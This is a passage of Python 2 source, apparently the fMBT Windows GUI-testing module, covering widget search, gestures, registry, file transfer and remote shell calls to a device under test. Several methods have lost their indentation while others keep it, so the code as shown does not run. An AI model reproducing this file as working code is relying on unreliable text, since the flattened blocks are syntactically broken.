if comparator(i) and (not onScreen or (self._itemOnScreen(i))):
foundItems.append(i)
if count > 0 and len(foundItems) >= count:
break
return foundItems
def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
if partial:
c = lambda item: (text in item._text)
else:
c = lambda item: (text == item._text)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsByClass(self, className, partial=False, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
if partial:
c = lambda item: (className in item._className)
else:
c = lambda item: (className == item._className)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsById(self, itemId, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
c = lambda item: (itemId == item._itemId or itemId == item.properties().get("AutomationId", None))
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsByProperties(self, properties, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
"""
Returns ViewItems where every property matches given properties
Parameters:
properties (dictionary):
names and required values of properties
Example:
view.findItemsByProperties({"Value": "HELLO", "Name": "File name:"})
See also:
viewitem.dumpProperties()
Notes:
- requires uiautomation (refreshView(viewSource="uiautomation"))
- all names and values are strings
"""
c = lambda item: 0 == len([key for key in properties
if properties[key] != item.properties().get(key, None)])
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsByPos(self, pos, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
"""
Returns list of ViewItems whose bounding box contains the position.
Parameters:
pos (pair of floats (0.0..0.1) or integers (x, y)):
coordinates that fall in the bounding box of found items.
other parameters: refer to findItems documentation.
Items are listed in ascending order based on area. They may
or may not be from the same branch in the widget hierarchy.
"""
x, y = self._intCoords(pos)
c = lambda item: (item.bbox()[0] <= x <= item.bbox()[2] and item.bbox()[1] <= y <= item.bbox()[3])
items = self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
# sort from smallest to greatest area
area_items = [((i.bbox()[2] - i.bbox()[0]) * (i.bbox()[3] - i.bbox()[1]), i) for i in items]
return [i for _, i in sorted(area_items)]
def items(self):
"""
Returns list of all items in the view
"""
return fmbtgti.sortItems(self._viewItems.values(), "topleft")
def save(self, fileOrDirName):
"""
Save view dump to a file.
"""
shutil.copy(self._dumpFilename, fileOrDirName)
class Device(fmbtgti.GUITestInterface):
    """
    A Windows device under test: provides screenshots, input synthesis
    and widget-hierarchy views through an fmbtwindows agent, typically
    running on a pythonshare server on the device.
    """
    def __init__(self, connspec=None, password=None, screenshotSize=(None, None),
                 connect=True, **kwargs):
        """Connect to windows device under test.

        Parameters:

          connspec (string or None, optional):
                  specification for connecting to a pythonshare
                  server that will run fmbtwindows-agent. The format is
                  "[socket://][password@]<host>[:<port>][/namespace]".
                  The default is None: run the agent on host, do not
                  connect to a pythonshare server (works only on Windows).

          password (string or None, optional):
                  authenticate to pythonshare server with given
                  password. The default is None (no authentication).

          screenshotSize (pair of integers, optional):
                  NOTE(review): accepted but not used here — presumably
                  consumed via setScreenshotSize(); confirm with callers.

          rotateScreenshot (integer, optional)
                  rotate new screenshots by rotateScreenshot degrees.
                  Example: rotateScreenshot=-90. The default is 0 (no
                  rotation).

          connect (boolean, optional):
                  Immediately establish connection to the device. The
                  default is True.

        To prepare a windows device for connection, launch there

        python pythonshare-server --password mysecretpwd

        When not on trusted network, consider ssh port forward, for
        instance.
        """
        fmbtgti.GUITestInterface.__init__(self, **kwargs)
        # Default view source is the second entry of _g_viewSources
        # ("uiautomation"); see refreshView()/setViewSource().
        self._defaultViewSource = _g_viewSources[1]
        # NOTE(review): kwargs is stored as-is; refreshView() reads its
        # default arguments from this dictionary.
        self._refreshViewDefaults = kwargs
        self._lastView = None
        self._lastViewStats = {}
        self._refreshViewRetryLimit = 1
        self._connspec = connspec
        self._password = password
        if connect:
            self.setConnection(WindowsConnection(
                self._connspec, self._password))
        else:
            # Offline instance: connect later via reconnect()/setConnection().
            self.setConnection(None)
def closeWindow(self, window):
"""
Send WM_CLOSE to window
Parameters:
window (window title (string) or handle (integer)):
window to which the command will be sent.
Returns True on success, otherwise False.
"""
return self.existingConnection().sendCloseWindow(window)
def errorReporting(self):
"""
Returns Windows error reporting (WER) settings in a dictionary
See also: setErrorReporting()
MSDN WER Settings.
"""
supported_settings = ["DisableArchive",
"Disabled",
"DisableQueue",
"DontShowUI",
"DontSendAdditionalData",
"LoggingDisabled",
"MaxArchiveCount",
"MaxQueueCount"]
settings = {}
for setting in supported_settings:
settings[setting] = self.getRegistry(
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting",
setting)[0]
return settings
def existingView(self):
if self._lastView:
return self._lastView
else:
raise FMBTWindowsError("view is not available. Missing refreshView()?")
    def fileProperties(self, filepath):
        """
        Returns file properties as a dictionary.

        Parameters:

          filepath (string):
                  full path to the file.
        """
        # Normalize to backslashes, then escape each backslash four-fold:
        # the string is embedded once into remote Python source (halving
        # the backslashes) and the WQL "where" clause needs the remaining
        # backslashes doubled.
        escapedFilename = filepath.replace('/', '\\').replace('\\', r'\\\\')
        return self.existingConnection().evalPython(
            '''wmicGet("datafile",'''
            '''componentArgs=("where", "name='%s'"))''' %
            escapedFilename)
def getFile(self, remoteFilename, localFilename=None, compress=False):
"""
Fetch file from the device.
Parameters:
remoteFilename (string):
file to be fetched on device
localFilename (optional, string or None):
file to be saved to local filesystem. If None,
return contents of the file without saving them.
compress (optional, boolean or integer):
if True, file contents will be compressed for the transfer.
Integer (0-9) defines compression level. The default is
False: transfer without compression.
"""
return self._conn.recvFile(remoteFilename, localFilename, compress)
def getMatchingPaths(self, pathnamePattern):
"""
Returns list of paths matching pathnamePattern on the device.
Parameters:
pathnamePattern (string):
Pattern for matching files and directories on the device.
Example:
getMatchingPaths("c:/windows/*.ini")
Implementation runs glob.glob(pathnamePattern) on remote device.
"""
return self._conn.recvMatchingPaths(pathnamePattern)
def getClipboard(self):
"""
Returns clipboard contents in text format.
See also: setClipboard()
"""
return self.existingConnection().evalPython("getClipboardText()")
    def itemOnScreen(self, guiItem, relation="touch", topWindowBbox=None):
        """
        Returns True if bbox of guiItem is non-empty and on the screen

        Parameters:

          relation (string, optional):
                  One of the following:
                  - "overlap": item intersects the screen and the window.
                  - "touch": mid point (the default touch point) of the item
                    is within the screen and the window.
                  - "within": the screen and the window includes the item.
                  The default is "touch".

          topWindowBbox ((left, top, right, bottom), optional):
                  bounding box of the top window; queried from the
                  device when not given.
        """
        # UIAutomation reports property values as strings, hence "True".
        if guiItem.properties().get("IsOffscreen", False) == "True":
            return False
        if relation == "touch":
            x1, y1, x2, y2 = guiItem.bbox()
            if x1 == x2 or y1 == y2:
                return False # a dimension is missing => empty item
            # Only the item's touch point is tested: a 1x1 box around coords().
            itemBox = (guiItem.coords()[0], guiItem.coords()[1],
                       guiItem.coords()[0] + 1, guiItem.coords()[1] + 1)
            partial = True
        elif relation == "overlap":
            itemBox = guiItem.bbox()
            partial = True
        elif relation == "within":
            itemBox = guiItem.bbox()
            partial = False
        else:
            raise ValueError('invalid itemOnScreen relation: "%s"' % (relation,))
        maxX, maxY = self.screenSize()
        if topWindowBbox == None:
            try:
                topWindowBbox = self.topWindowProperties()['bbox']
            except TypeError:
                # topWindowProperties() returned None: fall back to full screen.
                topWindowBbox = (0, 0, maxX, maxY)
        # The item must satisfy the relation against both the screen and
        # the top window bounding box.
        return (fmbtgti._boxOnRegion(itemBox, (0, 0, maxX, maxY), partial=partial) and
                fmbtgti._boxOnRegion(itemBox, topWindowBbox, partial=partial))
def kill(self, pid):
"""
Terminate process
Parameters:
pid (integer):
ID of the process to be terminated.
"""
try:
return self.existingConnection().evalPython(
"kill(%s)" % (repr(pid),))
except:
return False
def keyNames(self):
"""
Returns list of key names recognized by pressKey
"""
return sorted(_g_keyNames)
def osProperties(self):
"""
Returns OS properties as a dictionary
"""
return self.existingConnection().evalPython(
"wmicGet('os')")
    def pinch(self, (x, y), startDistance, endDistance,
              finger1Dir=90, finger2Dir=270, movePoints=20,
              duration=0.75):
        """
        Pinch (open or close) on coordinates (x, y).

        Parameters:
          x, y (integer):
                  the central point of the gesture. Values in range
                  [0.0, 1.0] are scaled to full screen width and
                  height.

          startDistance, endDistance (float):
                  distance from both finger tips to the central point
                  of the gesture, at the start and at the end of the
                  gesture. Values in range [0.0, 1.0] are scaled up to
                  the distance from the coordinates to the edge of the
                  screen. Both finger tips will reach an edge if
                  distance is 1.0.

          finger1Dir, finger2Dir (integer, optional):
                  directions for finger tip movements, in range [0,
                  360]. 0 is to the east, 90 to the north, etc. The
                  defaults are 90 and 270.

          movePoints (integer, optional):
                  number of points to which finger tips are moved
                  after laying them to the initial positions. The
                  default is 20.

          duration (float, optional):
                  duration of the gesture in seconds, the default is 0.75.
        """
        screenWidth, screenHeight = self.screenSize()
        # NOTE(review): screenDiagonal is computed but never used below.
        screenDiagonal = math.sqrt(screenWidth**2 + screenHeight**2)
        if x == None: x = 0.5
        if y == None: y = 0.5
        x, y = self.intCoords((x, y))
        # Relative distances (floats in [0.0, 1.0]) are scaled to the
        # shorter of the two edge distances in the finger directions;
        # anything else is taken as an absolute pixel distance.
        if type(startDistance) == float and 0.0 <= startDistance <= 1.0:
            startDistanceInPixels = (
                startDistance *
                min(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
                    fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
        else:
            startDistanceInPixels = int(startDistance)
        if type(endDistance) == float and 0.0 <= endDistance <= 1.0:
            endDistanceInPixels = (
                endDistance *
                min(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
                    fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
        else:
            endDistanceInPixels = int(endDistance)
        # Convert polar (direction, distance) to screen coordinates for
        # both finger tips; screen y grows downwards, hence "- sin".
        finger1startX = int(x + math.cos(math.radians(finger1Dir)) * startDistanceInPixels)
        finger1startY = int(y - math.sin(math.radians(finger1Dir)) * startDistanceInPixels)
        finger1endX = int(x + math.cos(math.radians(finger1Dir)) * endDistanceInPixels)
        finger1endY = int(y - math.sin(math.radians(finger1Dir)) * endDistanceInPixels)
        finger2startX = int(x + math.cos(math.radians(finger2Dir)) * startDistanceInPixels)
        finger2startY = int(y - math.sin(math.radians(finger2Dir)) * startDistanceInPixels)
        finger2endX = int(x + math.cos(math.radians(finger2Dir)) * endDistanceInPixels)
        finger2endY = int(y - math.sin(math.radians(finger2Dir)) * endDistanceInPixels)
        self.existingConnection().sendPinch(
            (finger1startX, finger1startY), (finger1endX, finger1endY),
            (finger2startX, finger2startY), (finger2endX, finger2endY),
            movePoints, duration)
        return True
    def pinchOpen(self, (x, y) = (0.5, 0.5), startDistance=0.1, endDistance=0.5, **pinchKwArgs):
        """
        Make the open pinch gesture.

        Parameters:

          x, y (integer, optional):
                  the central point of the gesture, the default is in
                  the middle of the screen.

          startDistance, endDistance (float, optional):
                  refer to pinch documentation. The default is 0.1 and
                  0.5.

          for the rest of the parameters, refer to pinch documentation.
        """
        # Opening pinch: startDistance < endDistance.
        return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
    def pinchClose(self, (x, y) = (0.5, 0.5), startDistance=0.5, endDistance=0.1, **pinchKwArgs):
        """
        Make the close pinch gesture.

        Parameters:

          x, y (integer, optional):
                  the central point of the gesture, the default is in
                  the middle of the screen.

          startDistance, endDistance (float, optional):
                  refer to pinch documentation. The default is 0.5 and
                  0.1.

          rest of the parameters: refer to pinch documentation.
        """
        # Closing pinch: startDistance > endDistance.
        return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def putFile(self, localFilename, remoteFilepath):
"""
Send local file to the device.
Parameters:
localFilename (string):
file to be sent.
remoteFilepath (string):
destination on the device. If destination is an
existing directory, the file will be saved to the
directory with its original name. Otherwise the file
will be saved with remoteFilepath as new name.
"""
return self._conn.sendFile(localFilename, remoteFilepath)
def rmFile(self, remoteFilepath):
"""
Remove a file from the device.
Parameters:
remoteFilepath (string):
file to be removed from the device.
"""
return self.existingConnection().evalPython(
"os.remove(%s)" % (repr(remoteFilepath),))
    def reconnect(self, connspec=None, password=None):
        """
        Close connections to the device and reconnect.

        Parameters:

          connspec (string, optional):
                  Specification for new connection. The default is current
                  connspec.

          password (string, optional):
                  Password for new connection. The default is current password.

        Returns True on success, otherwise False.
        """
        # Drop the old connection and collect garbage so its resources
        # are released before opening the new connection.
        self.setConnection(None)
        import gc
        gc.collect()
        if connspec != None:
            self._connspec = connspec
        if password != None:
            self._password = password
        if self._connspec == None:
            _adapterLog("reconnect failed: missing connspec")
            return False
        try:
            self.setConnection(WindowsConnection(
                self._connspec, self._password))
            return True
        except Exception, e:
            # Connection failure is logged and reported via return value.
            _adapterLog("reconnect failed: %s" % (e,))
            return False
    def refreshView(self, window=None, forcedView=None, viewSource=None,
                    items=None, properties=None, area=None):
        """
        (Re)reads widgets on the top window and updates the latest view.

        Parameters:

          window (integer (hWnd) or string (title), optional):
                  read widgets from given window instead of the top window.

          forcedView (View or filename, optional):
                  use given View object or view file instead of reading the
                  items from the device.

          viewSource (string, optional):
                  source of UI information. Supported sources are:
                  "uiautomation" the UIAutomation framework.
                  "enumchildwindows" less data
                  but does not require UIAutomation.
                  The default is "uiautomation".
                  You can define TreeWalker used by "uiautomation" by defining
                  viewSource as "uiautomation/raw", "uiautomation/control" or
                  "uiautomation/content".
                  See also setViewSource().

          items (list of view items, optional):
                  update only contents of these items in the view.
                  Works only for "uiautomation" view source.

          properties (list of property names, optional):
                  read only given properties from items, the default
                  is to read all available properties.
                  Works only for "uiautomation" view source.
                  See also setViewSource().

          area ((left, top, right, bottom), optional):
                  refresh only items that intersect the area.
                  The default is None: locations do not affect refreshed
                  items.

        See also setRefreshViewDefaults().

        Returns View object.
        """
        # Unset arguments fall back to per-device defaults
        # (setRefreshViewDefaults()).
        if window == None:
            window = self._refreshViewDefaults.get("window", None)
        if forcedView == None:
            forcedView = self._refreshViewDefaults.get("forcedView", None)
        if viewSource == None:
            viewSource = self.viewSource()
        if not viewSource in _g_viewSources:
            raise ValueError('invalid view source "%s"' % (viewSource,))
        if items == None:
            items = self._refreshViewDefaults.get("items", [])
        if properties == None:
            properties = self._refreshViewDefaults.get("properties", None)
        if area == None:
            area = self._refreshViewDefaults.get("area", None)
        if forcedView != None:
            # Use a pre-recorded view: either a View object or a dump file.
            retryCount = 0
            startTime = time.time()
            lastStartTime = startTime
            viewFilename = forcedView
            if isinstance(forcedView, View):
                self._lastView = forcedView
            elif type(forcedView) in [str, unicode]:
                try:
                    self._lastView = View(forcedView, ast.literal_eval(file(viewFilename).read()))
                except Exception:
                    # Unreadable/unparsable dump: no view available.
                    self._lastView = None
            endTime = time.time()
        else:
            # Live refresh: dump widget data from the device, retrying up to
            # self._refreshViewRetryLimit times on View construction errors.
            if self.screenshotDir() == None:
                self.setScreenshotDir(self._screenshotDirDefault)
            if self.screenshotSubdir() == None:
                self.setScreenshotSubdir(self._screenshotSubdirDefault)
            # Store the dump next to screenshots, with "view" suffix.
            viewFilename = self._newScreenshotFilepath()[:-3] + "view"
            retryCount = 0
            startTime = time.time()
            lastStartTime = startTime
            while True:
                try:
                    topWindowBbox = self.topWindowProperties()['bbox']
                except TypeError:
                    topWindowBbox = None # top window unavailable
                if area:
                    leftTopRightBottom = (
                        self.intCoords((area[0], area[1])) +
                        self.intCoords((area[2], area[3])))
                else:
                    leftTopRightBottom = None
                if viewSource == "enumchildwindows":
                    viewData = self._conn.recvViewData(window)
                else:
                    # "uiautomation[/walker]": pick the TreeWalker suffix.
                    if "/" in viewSource:
                        walker = viewSource.split("/")[1]
                    else:
                        walker = "raw"
                    if properties != None:
                        if properties == "all":
                            viewItemProperties = None
                        elif properties == "fast":
                            # Preselected minimal property set.
                            viewItemProperties = ["AutomationId",
                                                  "BoundingRectangle",
                                                  "ClassName",
                                                  "HelpText",
                                                  "ToggleState",
                                                  "Value",
                                                  "Minimum",
                                                  "Maximum",
                                                  "Name"]
                        elif isinstance(properties, list) or isinstance(properties, tuple):
                            viewItemProperties = list(properties)
                        else:
                            raise ValueError('invalid properties argument, expected "all", '
                                             '"fast" or a list')
                    else:
                        viewItemProperties = properties
                    viewData = self._conn.recvViewUIAutomation(
                        window, items, viewItemProperties, leftTopRightBottom, walker)
                # Persist the raw dump for save()/offline use.
                file(viewFilename, "w").write(repr(viewData))
                try:
                    self._lastView = View(
                        viewFilename, viewData,
                        itemOnScreen=lambda i: self.itemOnScreen(i, topWindowBbox=topWindowBbox))
                    break
                except Exception, e:
                    self._lastView = None
                    _adapterLog(
                        "refreshView %s failed (%s), source=%s topWindow=%s" %
                        (retryCount, e, repr(viewSource), self.topWindow()))
                    retryCount += 1
                    if retryCount < self._refreshViewRetryLimit:
                        time.sleep(0.2)
                    else:
                        break
                lastStartTime = time.time()
            endTime = time.time()
        itemCount = -1
        if self._lastView:
            itemCount = len(self._lastView._viewItems)
        # Record statistics of this refresh; see viewStats().
        self._lastViewStats = {
            "retries": retryCount,
            "timestamp": endTime,
            "total time": endTime - startTime,
            "last time": endTime - lastStartTime,
            "filename": viewFilename,
            "source": viewSource,
            "forced": (forcedView != None),
            "window": window,
            "view": str(self._lastView),
            "item count": itemCount}
        return self._lastView
def refreshViewDefaults(self):
"""Returns default arguments for refreshView() calls.
See also setRefreshViewDefaults().
"""
return dict(self._refreshViewDefaults)
def setClipboard(self, data):
"""
Set text on clipboard
Parameters:
data (string):
data to be set on the clipboard.
Note: any type of data on clipboard will be emptied.
See also: getClipboard()
"""
return self.existingConnection().evalPython(
"setClipboardText(%s)" % (repr(data),))
def setErrorReporting(self, settings):
"""
Modify Windows error reporting settings (WER)
Parameters:
settings (dictionary):
WER settings and values to be set.
Example: disable showing interactive crash dialogs
setErrorReporting({"DontShowUI": 1})
See also: errorReporting(),
MSDN WER Settings.
"""
for setting in settings:
self.setRegistry(
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting",
setting, settings[setting])
return True
    def setDisplaySize(self, size):
        """
        Transform coordinates of synthesized events (like a tap) from
        screenshot resolution to display input area size. By default
        events are synthesized directly to screenshot coordinates.

        Parameters:

          size (pair of integers: (width, height)):
                  width and height of display in pixels. If not given,
                  values from EnumDisplayMonitors are used.

        Returns None.
        """
        width, height = size
        screenWidth, screenHeight = self.screenSize()
        # Linear scaling in both directions between screenshot coordinates
        # and display input coordinates.
        # NOTE(review): Python 2 integer division in the lambdas below --
        # presumably intended for pixel coordinates; confirm when porting
        # to Python 3.
        self._conn.setScreenToDisplayCoords(
            lambda x, y: (x * width / screenWidth,
                          y * height / screenHeight))
        self._conn.setDisplayToScreenCoords(
            lambda x, y: (x * screenWidth / width,
                          y * screenHeight / height))
def setForegroundWindow(self, window):
"""
Set a window with the title as a foreground window
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetForegroundWindow(window)
def setRefreshViewDefaults(self, **kwargs):
"""Set new default arguments for refreshView() calls
Parameters:
**kwargs (keyword arguments)
new default values for optional refreshView() parameters.
Note: default arguments are overridden by arguments given
directly in refreshView calls.
Note: setViewSource() can change the default arguments.
Example:
setRefreshViewDefaults(window="My app title",
viewSource="uiautomation/content")
"""
self._refreshViewDefaults = kwargs
def findRegistry(self, rootKey, key=None, valueName=None, limit=1):
"""Search for key and/or valueName from the registry.
Returns a list of matching (fullKeyPath, valueName) pairs
found under the rootKey. The list has at most limit items, the
default is 1.
Parameters:
rootKey (string):
root key path for the search. Example:
"HKEY_LOCAL_MACHINE".
key (string, optional):
key name to be searched for under the rootKey.
The key is a regular expression that is searched for
from full key path. Use "\\name$" to require exact
match.
If not given, valueName should be defined.
valueName (string, optional):
value name to be searched for under the rootKey.
The value can be a regular expression.
If not given, key should be defined and
returned valueName will be None.
limit (integer, optional):
maximum number of matches to be returned. The
default is 1. limit=None returns all matching
pairs.
Example:
findRegistry("HKEY_LOCAL_MACHINE", key="\\Windows$")
"""
if key == None and valueName == None:
raise ValueError("either key or valueName must be provided")
return self.existingConnection().evalPython(
'findRegistry(%s, key=%s, valueName=%s, limit=%s)' % (
repr(rootKey), repr(key), repr(valueName), repr(limit)))
def setRegistry(self, key, valueName, value, valueType=None):
"""
Set Windows registry value.
Parameters:
key (string):
full key name.
valueName (string):
name of the value to be set.
value (string):
string that specifies the new value.
valueType (string, optional for str and int values):
REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN,
REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK,
REG_MULTI_SZ, REG_NONE, REG_RESOURCE_LIST or REG_SZ.
Default types for storing str and int values
are REG_SZ and REG_DWORD.
Example:
setRegistry(r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
"\Control\Session Manager\Environment",
"PATH", r"C:\MyExecutables", "REG_EXPAND_SZ")
Returns True on success.
"""
return self.existingConnection().evalPython(
"setRegistry(%s,%s,%s,%s)" % (repr(key), repr(valueName),
repr(value), repr(valueType)))
def getRegistry(self, key, valueName):
"""
Return Windows registry value and type
Parameters:
key (string):
full key name.
valueName (string):
name of the value to be read.
Returns a pair (value, valueType)
Example:
getRegistry(r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
"\Control\Session Manager\Environment", "PATH")
"""
return self.existingConnection().evalPython(
"getRegistry(%s,%s)" % (repr(key), repr(valueName)))
def processList(self):
"""
Return list of processes running on the device.
Returns list of dictionaries with keys:
"pid": process ID, and
"ProcessImageFileName": full path to the executable in win32 format.
"""
return self.existingConnection().evalPython("processList()")
def processStatus(self, pid):
"""
Return status of a process
Parameters:
pid (integer):
Process ID of the process
Returns properties in a dictionary.
Example:
print "Memory usage:", processStatus(4242)["WorkingSetSize"]
"""
return self.existingConnection().evalPython(
"processStatus(%s)" % (repr(pid),))
def productList(self):
"""
Return list of products installed or advertised in the system
Returns list of dictionaries, each containing properties of a product.
"""
return self.existingConnection().evalPython("products()")
def pycosh(self, command):
"""
Run command in pycosh shell on the device.
Parameters:
command (string):
pycosh command to be executed. Pycosh implements
stripped-down versions of zip, tar, find, md5sum, diff,
grep, head, tail, curl,... the usual handy shell utils.
For information on pycosh commands, try
device.pycosh("help") or run in shell:
echo help | python -m pycosh.
"""
return self.existingConnection().pycosh(command)
def setScreenshotSize(self, size):
"""
Force screenshots from device to use given resolution.
Overrides detected monitor resolution on device.
Parameters:
size (pair of integers: (width, height)):
width and height of screenshot.
"""
self._conn.setScreenshotSize(size)
def setTopWindow(self, window):
"""
Set a window as a foreground window and bring it to front.
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetTopWindow(window)
    def setViewSource(self, source, properties=None):
        """
        Set default view source for refreshView()

        Parameters:

          source (string):
                  default source, "enumchildwindows" or "uiautomation",
                  "uiautomation/raw", "uiautomation/control",
                  "uiautomation/content".

          properties (string or list of strings, optional):
                  set list of view item properties to be read.
                  "all" reads all available properties for each item.
                  "fast" reads a set of preselected properties.
                  list of strings reads properties in the list.
                  The default is "all".

        Returns None.

        See also refreshView(), viewSource(), refreshViewDefaults().
        """
        if not source in _g_viewSources:
            raise ValueError(
                'invalid view source "%s", expected one of: "%s"' %
                (source, '", "'.join(_g_viewSources)))
        # Stored as refreshView() defaults. "properties" is set only when
        # given, so an earlier default is not clobbered by None.
        if properties != None:
            self._refreshViewDefaults["properties"] = properties
        self._refreshViewDefaults["viewSource"] = source
def shell(self, command):
"""
Execute command in Windows.
Parameters:
command (string or list of strings):
command to be executed. Will be forwarded directly
to subprocess.check_output. If command is a string,
then it will be executed in subshell, otherwise without
shell.
Returns what is printed by the command.
If you wish to receive exitstatus or standard output and error
separated from command, refer to shellSOE().
"""
return self._conn.evalPython('shell(%s)' % (repr(command),))
def shellSOE(self, command, asyncStatus=None, asyncOut=None, asyncError=None, cwd=None):
"""
Execute command on Windows.
Parameters:
command (string or list of strings):
command to be executed. If command is a list of
string, it will be executed without shell
(subprocess.check_output with shell=False).
If command is a single-line string, it will be
executed in shell (subprocess.check_output with
shell=True).
If command is a multiline string, it will be written
to a BAT file and executed as a script.
asyncStatus (string, True or None)
filename (on device) to which the status of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but exit status will not be
saved. The default is None, that is, command will be
run synchronously, and status will be returned in
the tuple.
asyncOut (string, True or None)
filename (on device) to which the standard output of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but output will not saved. The
default is None.
asyncError (string, True or None)
filename (on device) to which the standard error of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but standard error will not be
saved. The default is None.
cwd (string, optional)
current working directory in which the command
will be executed. If not given, the cwd defaults
to the current working directory of the pythonshare
server process on the device, or the cwd of the Python
process if executed on host without pythonshare-server.
Returns triplet: exit status, standard output and standard error
from the command.
If executing command fails, returns None, None, None.
"""
return self._conn.evalPython(
'shellSOE(%s, asyncStatus=%s, asyncOut=%s, asyncError=%s, cwd=%s)'
% (repr(command),
repr(asyncStatus), repr(asyncOut), repr(asyncError),
repr(cwd)))
def showWindow(self, window, showCmd=SW_NORMAL):
"""
Send showCmd to window.
Parameters:
window (window title (string) or handle (integer)):
window to which the command will be sent.
showCmd (integer or string):
command to be sent. Valid commands are 0..11:
SW_HIDE, SW_NORMAL, SW_MINIMIZED, SW_MAXIMIZE,
SW_NOACTIVATE, SW_SHOW SW_MINIMIZE, SW_MINNOACTIVE,
SW_SHOWNA, SW_RESTORE, SW_DEFAULT, SW_FORCEMINIMIZE.
Returns True if the window was previously visible,
otherwise False.
Notes: calls ShowWindow in user32.dll.
"""
return self.existingConnection().sendShowWindow(window, showCmd)
def tapText(self, text, partial=False, **tapKwArgs):
"""
Find an item with given text from the latest view, and tap it.
Parameters:
partial (boolean, optional):
refer to verifyText documentation. The default is
False.
tapPos (pair of floats (x, y)):
refer to tapItem documentation.
button, long, hold, count, delayBetweenTaps (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
items = self.existingView().findItemsByText(text, partial=partial, count=1, onScreen=True)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def topWindow(self):
"""
Returns a handle to the window.
"""
return self.existingConnection().evalPython(
"ctypes.windll.user32.GetForegroundWindow()")
def topWindowProperties(self):
"""
Return properties of the top window as a dictionary
"""
return self._conn.recvTopWindowProperties()
def verifyText(self, text, partial=False):
"""
Verify that the last view has at least one item with given
text.
Parameters:
text (string):
text to be searched for in items.
partial (boolean, optional):
if True, match items if item text contains given
text, otherwise match only if item text is equal to
the given text. The default is False (exact match).
"""
assert self._lastView != None, "View required."
return self._lastView.findItemsByText(text, partial=partial, count=1, onScreen=True) != []
def viewSource(self):
"""
Returns current default view source.
See also refreshView(), setViewSource().
"""
return self._refreshViewDefaults.get(
"viewSource", self._defaultViewSource)
def windowList(self):
"""
Return list of properties of windows (dictionaries)
Example: list window handles and titles:
for props in d.windowList():
print props["hwnd"], props["title"]
"""
return self._conn.recvWindowList()
def windowProperties(self, window):
"""
Returns properties of a window.
Parameters:
window (title (string) or hwnd (integer):
The window whose properties will be returned.
Returns properties in a dictionary.
"""
return self.existingConnection().recvWindowProperties(window)
def windowStatus(self, window):
"""
Returns status of a window.
Parameters:
window (title (string) or hwnd (integer):
The window whose properties will be returned.
Returns status in a dictionary.
"""
return self.existingConnection().recvWindowStatus(window)
    def view(self):
        """Returns the latest view, or None if no refreshView() has succeeded.

        Unlike existingView(), does not raise when there is no view.
        """
        return self._lastView
    def viewStats(self):
        """Returns statistics of the latest refreshView() call (dictionary)."""
        return self._lastViewStats
class _NoPythonshareConnection(object):
    """Fake Pythonshare connection, evaluate everything locally"""
    def __init__(self, namespace="default"):
        # Maps namespace name -> dict of names defined in that namespace.
        self._namespaces = {}
        self._ns = namespace
    def exec_in(self, ns, code):
        """Execute code in namespace ns (created on first use)."""
        if not ns in self._namespaces:
            self._namespaces[ns] = {}
        exec code in self._namespaces[ns]
    def eval_in(self, ns, expr):
        """Evaluate expression in namespace ns and return its value."""
        if not ns in self._namespaces:
            self._namespaces[ns] = {}
        return eval(expr, self._namespaces[ns])
    def namespace(self):
        """Return the default namespace name."""
        return self._ns
class WindowsConnection(fmbtgti.GUITestConnection):
    def __init__(self, connspec, password):
        """Open a connection to the fmbtwindows agent.

        connspec: pythonshare connection spec, or None to run the agent
        in this process (possible only on Windows hosts).
        password: pythonshare authentication, or None.
        """
        fmbtgti.GUITestConnection.__init__(self)
        self._screenshotSize = (None, None) # autodetect
        # pycosh sources are uploaded lazily on the first pycosh() call.
        self._pycosh_sent_to_dut = False
        if connspec != None:
            self._agent = pythonshare.connect(connspec, password=password)
        else:
            if os.name != "nt":
                raise ValueError("connecting to host works only on Windows")
            # No server: execute agent code locally in this process.
            self._agent = _NoPythonshareConnection()
        self._agent_ns = self._agent.namespace()
        # Load the agent code (fmbtwindows_agent.py, located next to this
        # module) into the agent namespace.
        agentFilename = os.path.join(
            os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
            "fmbtwindows_agent.py")
        self._agent.exec_in(self._agent_ns, file(agentFilename).read())
        # Identity coordinate mapping until setScreenshotSize() is called.
        self.setScreenToDisplayCoords(lambda x, y: (x, y))
        self.setDisplayToScreenCoords(lambda x, y: (x, y))
    def pycosh(self, command):
        """Evaluate a pycosh command in the agent and return its output."""
